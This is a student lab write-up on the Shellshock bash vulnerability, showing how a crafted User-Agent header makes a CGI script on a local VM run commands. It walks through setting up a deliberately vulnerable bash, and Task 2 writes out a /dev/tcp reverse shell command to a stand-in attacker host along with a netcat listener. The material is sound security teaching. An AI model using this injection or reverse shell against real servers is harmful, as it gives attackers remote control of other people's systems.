
Shellshock Lab

Attack on CGI programs

Pavan Hugar

The Common Gateway Interface (CGI) is commonly used by web servers to run executable programs that dynamically
generate web pages. CGI programs are often shell scripts and therefore invoke bash, so they may
be subject to the Shellshock attack. In this lab we demonstrate how an attacker can use the
Shellshock vulnerability to make a CGI program on a remote server execute an arbitrary command.

Environment Setup:

Enable CGI in your VM (it's ok to ignore warning):

Download vulnerable bash binary from here: bash. Make the bash executable:

Link /bin/sh to the absolute path of our vulnerable bash program.

Task 1:

In this task, we launch the Shellshock attack on a remote web server (for now, the local system). Many
web servers enable CGI, which is a standard method for generating dynamic content on web pages
and web applications. Many CGI programs are written as shell scripts. Therefore, before such a CGI
program runs, the shell is invoked first, and that invocation can be triggered remotely by a request sent
from the attacker's computer.

myprog.cgi

#!/bin/sh
# Minimal CGI response: content type, then the blank line that ends the headers.
echo "Content-type: text/plain"
echo
echo
#echo "Hello World"
echo "*** Environment variables ***"
# Print the environment of this shell process (the CGI request headers land here as HTTP_* variables).
strings /proc/$$/environ

For Task 1 we create a CGI program named myprog.cgi with the content shown above. All it does is
print every environment variable of the current process.

Next we will move the CGI program to the default CGI directory and make it executable:
sudo cp myprog.cgi /usr/lib/cgi-bin/
sudo chmod 755 /usr/lib/cgi-bin/myprog.cgi

Let us use the curl command to run the CGI program and see whether it works:

curl http://localhost/cgi-bin/myprog.cgi

In the resulting output (shown in the screenshot) we see the list of environment variables of the CGI process.

curl is a command line tool for transferring data to or from a server using one of the supported protocols. Here we use
it to request the myprog.cgi program we created.

Next we use curl with the user-agent option to pass a crafted value to the server and trigger the
Shellshock vulnerability. In the payload we used the "ls -l" command, which lists the files in the working
directory of the running program, /usr/lib/cgi-bin. The response shows the file names and
their attributes, which confirms that the vulnerability let us run a command through bash.

The curl user-agent option lets us choose the value of the User-Agent header that the server receives, and the
web server copies that header into the environment variable HTTP_USER_AGENT of the CGI program. This is the
channel we use to exploit the Shellshock vulnerability: in the user agent we place a function definition, followed by
a semicolon and then additional commands, all inside a single header value. When curl sends the request, the CGI
program named in the URL is executed. The program is a shell script, so bash is started first; at startup bash scans
its environment variables and, for each value that looks like an exported function definition, parses it and defines the
function. A vulnerable bash does not stop at the end of the function body: it also executes whatever follows it, so in
the example above "ls -l" runs and the directory contents are listed.

From the bash source code, we can see that when an environment variable holds a function definition, bash turns it
into a function definition statement by replacing the "=" with a space and then runs it through parse_and_execute().
This is where the vulnerability lies: if the user appends extra commands to the variable, the vulnerable bash executes
them after parsing the function. As indicated in the screenshot, bash only checks that the value begins with the
function-definition marker; it does not check whether the rest of the value contains further commands separated by
semicolons, so those commands are executed too.

Hence, to show the full impact, we next perform a reverse shell attack to take control of the server.

Task 2:

Gain a reverse shell by exploiting the Shellshock vulnerability of the CGI program

In the screenshot above, the first two lines show that a listener is started on the attacker machine
with the "netcat -l" command, waiting for a connection on port 7070. This lets us keep a persistent
connection between the attacker machine and the web server.

Next, we execute the following reverse shell command for the attack to succeed:

/bin/bash -i > /dev/tcp/attacker_ip/7070 0<&1 2>&1

We therefore pass this reverse shell command as the user-agent value of the curl command, as
shown in the screenshot below. If the attack succeeds, the server machine's shell prompt appears on
the attacker machine [10.0.2.15].

In our first terminal we can also see that netcat accepts the connection, after which a
shell prompt is displayed. That prompt belongs to the bash process started by the CGI request.

This can be observed in the screenshot below, which shows the user ID of the remote CGI
process in the prompt: www-data@VM:/usr/lib/cgi-bin
Once we have this shell, every command we type is executed directly on the server.
